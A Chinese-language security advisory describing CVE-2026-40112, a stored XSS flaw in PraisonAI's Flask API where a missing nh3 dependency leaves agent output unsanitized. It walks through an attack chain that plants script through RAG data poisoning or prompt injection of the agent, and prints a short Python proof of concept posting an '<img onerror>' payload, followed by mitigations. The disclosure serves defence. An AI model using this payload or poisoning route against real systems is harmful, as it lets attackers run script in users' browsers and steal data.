IPBUF安全漏洞报告
English
CVE-2026-40112 CVSS 5.4 中危

CVE-2026-40112 PraisonAI 存储型XSS漏洞

披露日期: 2026-04-09
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-40112
漏洞类型
存储型跨站脚本攻击
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
PraisonAI

相关标签

XSSStored XSSPraisonAIRAGHTML InjectionCVE-2026-40112Flask

漏洞概述

PraisonAI 4.5.128之前版本存在存储型XSS漏洞。由于项目配置遗漏`nh3`依赖,HTML清理函数失效,API端点直接渲染未过滤的Agent输出。攻击者可通过RAG数据污染或提示注入植入恶意脚本,在受害者浏览器中执行任意代码。

技术细节

该漏洞源于PraisonAI的Flask API端点(src/praisonai/api.py)对Agent输出的HTML渲染处理不当。虽然代码定义了`_sanitize_html`函数旨在利用`nh3`库进行过滤,但`pyproject.toml`未将其列为依赖。在默认安装环境下,`nh3`库缺失导致清理函数变为“空操作”,直接返回原始HTML。攻击者可利用RAG数据投毒、Web爬取结果篡改或提示词注入等手段控制Agent输入,将存储型XSS Payload注入系统。一旦用户访问受感染的API输出,恶意JavaScript即可在浏览器上下文中执行。

攻击链分析

STEP 1
侦察
攻击者识别出目标使用的是PraisonAI 4.5.128之前的版本,且确认其Flask API接口对外暴露。
STEP 2
武器化
攻击者构造恶意的JavaScript代码或HTML标签(如<script>或<img onerror>),准备用于注入。
STEP 3
投递
通过RAG数据源投毒、篡改Web抓取结果或利用提示词注入,将恶意载荷发送给Agent,使其被包含在Agent的输出中。
STEP 4
利用
由于系统缺少`nh3`库,HTML清理函数失效,恶意载荷被原样存储并渲染在API响应中。
STEP 5
执行
管理员或用户访问包含该Agent输出的页面,浏览器解析恶意脚本并执行,导致敏感信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-40112 # The goal is to inject a script via agent input that gets rendered unsanitized. import requests target_url = "http://localhost:8000/api/agent/chat" # Malicious payload to be injected via Agent input (e.g., RAG or Prompt) # Since nh3 is missing, this script tag will not be sanitized. xss_payload = "<img src=x onerror=alert('CVE-2026-40112')>" # Prepare the data payload data = { "prompt": xss_payload, "agent_options": {} } try: response = requests.post(target_url, json=data) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check the response or the agent's output page for the alert popup.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}")

影响范围

PraisonAI < 4.5.128

防御指南

临时缓解措施
如果无法立即升级版本,请务必在Python环境中手动安装`nh3`库(pip install nh3),以恢复HTML清理功能。同时,应严格限制对Flask API端点的访问权限,并对输入给Agent的外部数据源(如RAG文档库)进行安全清洗,防止恶意HTML注入。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表